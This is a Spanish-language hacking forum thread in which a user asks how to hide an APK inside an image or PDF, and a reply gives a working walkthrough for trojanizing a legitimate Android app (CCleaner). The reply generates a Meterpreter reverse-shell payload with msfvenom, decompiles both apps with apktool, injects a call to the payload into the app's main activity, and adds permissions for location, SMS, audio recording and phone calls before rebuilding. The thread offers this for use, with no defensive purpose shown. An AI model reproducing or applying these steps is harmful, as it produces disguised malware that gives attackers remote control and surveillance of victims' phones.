[SOLUCIONADO] Embender un .Apk en un archivo?

Iniciado por Slenderhack, Enero 28, 2018, 04:42:40 PM

Tema anterior - Siguiente tema

0 Miembros y 1 Visitante están viendo este tema.

Enero 28, 2018, 04:42:40 PM Ultima modificación: Febrero 05, 2018, 03:56:47 PM por xyz
Saludos  :)
mi pregunta es simple , se puede embender un .apk en una imagen o un pdf  y como se hace ?
desde que se metio mi curiosidad eh estado googleando y no encuentro herramientas disponibles pues ya fueron eliminadas
ya me han dado consejos como usar shellter o Trojanizer pero estos generan un .exe por tanto android no lo corre
espero alguien pueda resolver mi duda , gracias por leer

hola te resumo esto q encontre:
Para empezar generamos el payload para Android con msf:
Código: php
msfvenom -p android/meterpreter/Payload_Type LHOST=IP_Address LPORT=Incoming_Port -o meterpreter.apk

Nos descargamos una apk legitima como ccleaner y decompilamos las dos con apktool:
Código: php
apktool d –f –o payload meterpeter.apk

Código: php
apktool d –f –o original ccleaner.apk


Copiamos la carpeta metasploit desde /payload/smali/com/metasploit a /original/smali/com/piriform
Nos vamos la carpeta ./original/ y editamos AndroidManifest.xml

Buscamos las líneas siguientes que nos servirán como guía para encontrar la ruta a la aplicación principal que es la que nosotros queremos modificar:

<action android:name="android.intent.action.MAIN"/>
<category android:name="android.intent.category.LAUNCHER"/>

Encima de estas, encapsulándolas habrá una etiqueta <activity
Nos fijamos en la propiedad Android:name= de esta etiqueta que tendrá una estructura similar a "com.piriform.ccleaner.ui.activity.MainActivity"

Por tanto, ya sabemos el fichero que tenemos que editar de nuestra app legitima (dentro de ./original/smali/), nos vamos a este fichero que será algo parecido a "com/piriform/ccleaner/ui/activity/MainActivity.smali" , es decir, por cada "." Será una "/".

Editamos este fichero .smali y buscamos la línea:

Código: php
;->onCreate(Landroid/os/Bundle;)V


En la siguiente línea a esta ponemos:

Código: php
invoke-static {p0}, Lcom/metasploit/stage/Payload;->start(Landroid/content/Context;)V


Donde le indicamos que invoque nuestra app que en este caso es el Payload de msf y después continúe con la ejecución normal de la app legitima

Ahora vamos a añadir más permisos a esta app de los que tiene, nos vamos dentro del directorio de la aplicación ./original/ y modificamos el AndoridManifest.xml
Añadiremos los permisos que consideremos, en mi caso puse estos:

Código: php
<uses-permission android:name="android.permission.ACCESS_COURSE_LOCATION"/>
<uses-permission android:name="android.permission.CHANGE_WIFI_STATE"/>
<uses-permission android:name="android.permission.ACCESS_FINE_LOCATION"/>
<uses-permission android:name="android.permission.SEND_SMS"/>
<uses-permission android:name="android.permission.RECEIVE_SMS"/>
<uses-permission android:name="android.permission.RECORD_AUDIO"/>
<uses-permission android:name="android.permission.CALL_PHONE"/>


ahora vamos a recompilar otra vez la app, hacemos:

Código: php
apktool b original/


Consejos:
Si vas a descargar ccleaner como en el ejemplo, no descargues la ultima version de este pues modificaron los archivos de MainActivity(al parecer ya vieron este manual ;D ;D)